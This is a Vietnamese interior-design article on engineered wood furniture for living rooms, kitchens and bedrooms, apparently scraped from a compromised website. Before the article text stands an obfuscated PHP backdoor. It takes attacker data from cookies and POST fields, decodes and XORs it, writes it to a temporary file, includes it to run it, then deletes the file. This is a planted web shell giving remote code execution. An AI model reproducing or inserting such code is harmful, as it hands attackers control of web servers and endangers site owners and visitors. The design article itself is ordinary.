$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Thiết kế nội thất gỗ công nghiệp: kiến tạo không gian bền vững
Image Alt

Thiết kế nội thất gỗ công nghiệp: kiến tạo không gian bền vững

Thiết kế nội thất phòng khách chung cư

Thiết kế nội thất gỗ công nghiệp: kiến tạo không gian bền vững

Tài nguyên thiên nhiên ngày càng suy kiệt. Bên cạnh hoạt cứu chữa tự nhiên, các nghiên cứu ứng dụng khoa học kỹ thuật tạo ra những giải pháp thay thế là vô cùng cần thiết. Và vật liệu gỗ công nghiệp là một trong những kết quả của quá trình đó. Hãy cùng tham khảo bài viết thiết kế nội thất gỗ công nghiệp để cùng kiến tạo nên không gian sống bền vững.

Gỗ công nghiệp là gì?

Gỗ công nghiệp (Wood – Based Panel) là loại gỗ sử dụng keo hay hóa chất kết hợp với gỗ vụn để làm ra tấm gỗ. Gỗ công nghiệp là vật liệu bền vững vì đa số được làm từ các nguyên liệu thừa, nguyên liệu tận dụng và tái sinh từ ngọn cành của cây gỗ tự nhiên.

Gỗ công nghiệp

Các loại gỗ công nghiệp phổ biến hiện nay

Gỗ công nghiệp bao gồm hai phần: cốt gỗ và lớp phủ bề mặt. Một số loại cốt gỗ công nghiệp được sử dụng nhiều trong thiết kế nội thất hiện nay: MDF, MFC và HDF. Lớp phủ bề mặt của vật liệu này cũng vô cùng đa dạng, phù hợp với nhiều kiểu không gian khác nhau.

Đặc điểm gỗ công nghiệp:

Gỗ công nghiệp được sản xuất dựa trên sự kế thừa những ưu điểm và khắc phục nhược điểm của gỗ tự nhiên. Cùng với sự ứng dụng công nghệ kỹ thuật hiện đại tạo nên loại vật liệu được sử dụng nhiều nhất trong thiết kế nội thất chung cư hiện nay.

Ưu điểm của gỗ công nghiệp:

Độ bền cao, khả năng chịu tác động lực lớn.

Có khả năng chống ẩm và chịu nhiệt độ cao.

Không bị cong vênh, co ngót theo thời gian.

Giá thành rẻ hơn gỗ tự nhiên, thời gian thi công sản xuất nhanh.

Nhiều bề mặt phủ với màu sắc và họa tiết đa dạng, phù hợp với nhiều phong cách khác nhau.

Thiết kế nội thất gỗ công nghiệp

Gỗ công nghiệp với khả năng chịu nhiệt, ẩm cao vô cùng phù hợp với môi trường bếp

Nhược điểm của gỗ công nghiệp:

Khả năng chịu lực không bằng gỗ tự nhiên.

Không làm được đồ trạm trổ hay đồ cần tạo họa tiết, đường soi.

Gợi ý thiết kế nội thất gỗ công nghiệp đẹp cho nhà ở:

Gỗ công nghiệp không còn xa lạ khi làm nội thất nhà ở, đặc biệt là các mẫu thiết kế nội thất hiện đại. Dưới đây là một số gợi ý về ứng dụng vật liệu này cho ngôi nhà của bạn. Hãy cùng khám phá ngay nào.

Thiết kế nội thất phòng khách từ gỗ công nghiệp:

Thiết kế nội thất phòng khách chung cư

Nội thất phòng khách nhà chung cư

Kệ ti vi gỗ công nghiệp

Thiết kế kệ tivi cho nhà phố

Hầu hết đồ nội thất phòng khách đều được làm bằng gỗ công nghiệp. Từ các vật dụng nội thất cơ bản như bộ bàn ghế, kệ tivi, tủ chứa đồ,… Đến các vật dụng trang trí như vách lam, kệ trang trí.

Thiết kế tủ bếp gỗ công nghiệp:

Tủ bếp gỗ công nghiệp MDF phủ Melamine

Tủ bếp gỗ MDF chống ẩm phủ Melamine

tủ bếp Acrylic bóng gương

Tủ bếp MDF chống ẩm phủ Acrylic bóng gương sang trọng

Tủ bếp gỗ công nghiệp được nhiều người ưu tiên lựa chọn trong những năm gần đây. Gỗ công nghiệp có những đặc điểm có thể đáp ứng được môi trường nhiệt ẩm cao như khu vực bếp nấu. Từ đó tạo nên một không gian nấu nướng thẩm mỹ nhưng cũng không kém phần tiện nghi.

Thiết kế nội thất phòng ngủ từ gỗ công nghiệp:

Thiết kế nội thất phòng ngủ gỗ công nghiệp

Phòng ngủ kiểu Nhật với thiết kế giường giật cấp độc đáo

Tủ quần áo đẹp

Tủ quần áo cánh mở tiện lợi được bố trí trong phòng ngủ

Thiết kế nội thất phòng ngủ từ gỗ công nghiệp tạo nên không gian nghỉ ngơi mộc mạc và bình yên. Tông màu gỗ trầm ấm mang lại cảm giác dễ chịu cho người ở.

Gỗ công nghiệp được coi là sự thay thế hoàn hảo cho vật liệu gỗ tự nhiên trong bối cảnh suy kiệt tài nguyên như hiện nay. Đặc biệt với ưu điểm về giá thành và thẩm mỹ, đây sẽ là sự chọn tuyệt vời giúp bạn tiết kiệm chi phí khi làm nội thất cho ngôi nhà của mình.

BÀI VIẾT LIÊN QUAN: